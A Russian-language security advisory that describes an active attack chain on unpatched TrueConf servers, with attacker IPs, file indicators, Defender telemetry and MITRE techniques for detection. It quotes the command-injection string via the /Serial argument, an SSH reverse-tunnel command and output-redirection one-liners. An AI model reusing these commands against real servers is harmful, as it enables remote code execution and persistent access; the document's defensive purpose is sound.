Прямо сейчас в российском сегменте быстро набирает обороты атака с эксплуатацией цепочки уязвимостей в ПО для видеоконференцсвязи TrueConf. Команды специалистов по форензике центра мониторинга и реагирования на кибератаки RED Security SOC и компании СICADA8 собрали краткое описание Kill Chain, дали индикаторы компрометации и рекомендации по защите.
Kill Chain
Попытки эксплуатации цепочки уязвимостей в большинстве случаев инициируются с выходных узлов сервиса анонимизации Proton VPN.
На первом этапе злоумышленники эксплуатируют известные уязвимости TrueConf — BDU:2025-10114 (Server-Side Request Forgery) и BDU:2025-10116 (Command Injection), опубликованные в БДУ ФСТЭК совсем недавно — в августе этого года. Разработчик решения уже выпустил обновления безопасности, однако, судя по растущему числу атак с этим вектором, во многих организациях до сих пор стоят непропатченные версии.
После успешной эксплуатации этих уязвимостей злоумышленник запускает произвольную команду оболочки cmd.exe (например, скачивание и запуск исполняемых файлов) от имени процесса tc_webmgr.exe (C:\Program Files\TrueConf Server\httpconf\bin\tc_webmgr.exe).
Получив доступ к удаленному выполнению команд на сервере TrueConf, атакующие проводят разведку. Вывод команд перенаправляется в файл по относительному пути ../private/css/c.css (полный путь будет C:\Program Files\TrueConf Server\httpconf\site\private\css\c.css). Таким образом, результат выполняемых команд можно получить в качестве файла через публично доступную директорию веб‑сервера.
Следующим шагом злоумышленники создают локального пользователя с привилегированными правами доступа для дальнейшего закрепления в системе (audit, audit1). За этим следует подключение по SSH со скомпрометированного сервера к С&С-серверу злоумышленников для закрепления доступа. Закрепление в инфраструктуре происходит путем установки сервиса, указывающего на вредоносную библиотеку.
После этого злоумышленники начинают разведку инфраструктуры, чтобы выбрать дальнейший вектор атаки.
Атрибуция
Согласно данным коллег из отрасли, некоторые индикаторы относятся к группировке Head Mare. В частности, к адресу 5.178.96[.]82 на на VirusTotal дан комментарий: «C2 server Head Mare #APT Задание_на_оценку_N_2046_от_05_августа_2025_года.zip winnt64_.dll», а сама цепочка атаки совпадает с описанием коллег из BI.ZONE.
Рекомендации и индикаторы компрометации
Итак, первичный доступ получен путем эксплуатации публично доступных уязвимостей TrueConf, для которых уже существует обновление безопасности. Поэтому первое и главное: обновите ПО до самой новой версии.
Также в ходе атаки зафиксировано внедрение вредоносных библиотек и иные методы закрепления в инфраструктуре организации. Для детектирования данной активности атакующих рекомендуем:
осуществлять мониторинг доступа и активность процессов tc_webmgr.exe и tc_server.exe;
провести блокировку индикаторов компрометации на периметровом сетевом оборудовании;
осуществить поиск перечисленных ниже индикаторов активности злоумышленника
Мы рекомендуем делать первичную оценку не по индикаторам постэксплуатационной активности злоумышленника (они могут измениться в любое время), а по признакам эксплуатации цепочки уязвимостей. Соответствующие индикаторы даны ниже.
Сетевые индикаторы (постэксплуатационная активность):
| IoCs |
Контекст |
| 5.252.178[.]171 |
Сервер злоумышленников |
| 31.57.108[.]232 |
Сервер злоумышленников, исходящее SSH‑подключение |
| 31.58.134[.]251 |
Сервер злоумышленников |
xbox-updater[.]online
31.57.109[.]151 |
Сервер злоумышленников |
| 5.178.96[.]82 |
Сервер злоумышленников |
| 185.90.60[.]227 |
Сервер злоумышленников |
Файловые индикаторы (постэксплуатационная активность):
| IoCs |
Контекст |
| /Program Files/TrueConf Server/httpconf/site/private/css/c.css |
Файл сервера trueconf, куда выводятся результаты команд злоумышленников |
/Program Files/TrueConf Server/httpconf/site/public/r.dll
/Program Files/TrueConf Server/httpconf/site/public/a.dll |
Внедрение вредоносных библиотек (их вызов происходит через rundll32, который запускается через ту же цепочку уязвимостей отдельной командой — после командлета Invoke-WebRequest) |
%UserProfile%\Desktop\ssh.msi
%UserProfile%\Desktop\ssh.msi |
Установщик SSH для закрепления |
| %UserProfile%\Desktop\logparse.exe
%UserProfile%\Desktop\ddm\memprocfs.exe
%UserProfile%\Desktop\ddm\DumpIt.exe |
Разведка на сервере |
| %UserProfile%\Desktop\adrecon.ps1 |
Разведка в домене |
| %UserProfile%\Desktop\psexec.exe |
Перемещение по хостам |
| C:\Windows\System32\run.ps1 |
Скрипт с серверов для создания службы SscpSvc, прописывает библиотеку dfxhost.dll как ее исполняемый файл |
| C:\Windows\System32\dfxhost.dll |
Вредоносная служба SscpSvc (бэкдор) |
Индикаторы для поиска в данных телеметрии
Запуск SSH-туннеля (постэксплуатационная активность):
ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 39433 -p 443 ...@...
Инъекция команды (успешная эксплуатация BDU:2025-10116, признак эксплуатации):
cmd.exe /s /c "“C:\Program Files\TrueConf Server\tc_server.exe” /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial:||powershell -c "..."|| /File:"D:\TrueConf\activation\offlinereg.vrg""
Детектирование подозрительного процесса (признак эксплуатации) сигнатурами типа LowFidelity со стороны Windows Defender (подобное срабатывание попадает только в файловый лог — C:\ProgramData\Microsoft\Windows Defender\Support\MPLog-*.log и C:\ProgramData\Microsoft\Microsoft AntiMalware\Support\MPLog-*.log):
2025-XX-XXTYY:YY:YY.YYY Engine:command line reported as lowfi: C:\Windows\System32\cmd.exe(cmd.exe /s /c C:\Program Files\TrueConf Server\tc_server.exe /mode:1 /ServerID:a /ServerName:aaa1111#vcs /Serial:||powershell -c iwr ...|sc ../private/css/c.css|| /File:D:\TrueConf\activation\offlinereg.vrg)
Детектирование подозрительной библиотеки (постэксплуатационная активность) и сбор телеметрии со стороны Windows Defender:
BEGIN BM telemetry
GUID:{4AD0B666-1A8A-B24A-0D29-F948A849D844}
SignatureID:94230468382436
SigSha:e785adfba47a55a5a94699b391ee10a9299d593f
ThreatLevel:0
ProcessID:15244
ProcessCreationTime:X
SessionID:0
CreationTime:X
ImagePath:C:\Windows\System32\rundll32.exe
Taint Info:Friendly: Y; Reason: ; Modules: C:\Program Files\TrueConf Server\httpconf\site\public\r.dll:25,; Parents:
C:\Windows\System32\cmd.exe:15764:1,C:\Windows\System32\lsass.exe:900:2,
Operations:None
END BM telemetry
Журнал ошибок веб-сервера TrueConf также может содержать признаки эксплуатации (пример пути: C:\TrueConf\web_logs\error.*.log):
error: the required argument for option '--Serial' is missing
Важно: указанная выше строка является однозначным признаком попытки эксплуатации уязвимости (инъекция команды через аргумент /Serial), однако возможно появление эксплоитов, где до инъекции указывается корректный ключ активации.
В этом же журнале могут быть и следы постэксплуатационной активности (вывод stderr – утилит, которые не должны штатно запускаться от веб-сервера).
Вывод curl:
curl : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ curl ident.me|sc ../private/css/c.css
+ ~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
Вывод ssh:
Warning: Permanently added '[xxx]:443' (ED25519) to the list of known hosts.
Используемые техники
- Initial Access (TA0001)
- Exploit Public-Facing Application (T1190)
- Execution (TA0002)
- Command and Scripting Interpreter: PowerShell (T1059.001)
- Command and Scripting Interpreter: Windows Command Shell (T1059.003)
- System Binary Proxy Execution: Rundll32 (T1218.011)
- Persistence (TA0003)
- Create Account: Local Account (T1136.001)
- Valid Accounts: Domain Accounts (T1078.002)
- Valid Accounts: Local Accounts (T1078.003)
- Create or Modify System Process: Windows Service (T1543.003)
- Credential Access (TA0006)
- OS Credential Dumping: LSASS Memory (T1003.001)
- Discovery (TA0007)
- Account Discovery: Local Account (T1087.001)
- Network Service Discovery (T1046)
- Lateral Movement (TA0008)
- Remote Services: Remote Desktop Protocol (T1021.001)
- Command and Control (TA0011)
- Protocol Tunneling (T1572)
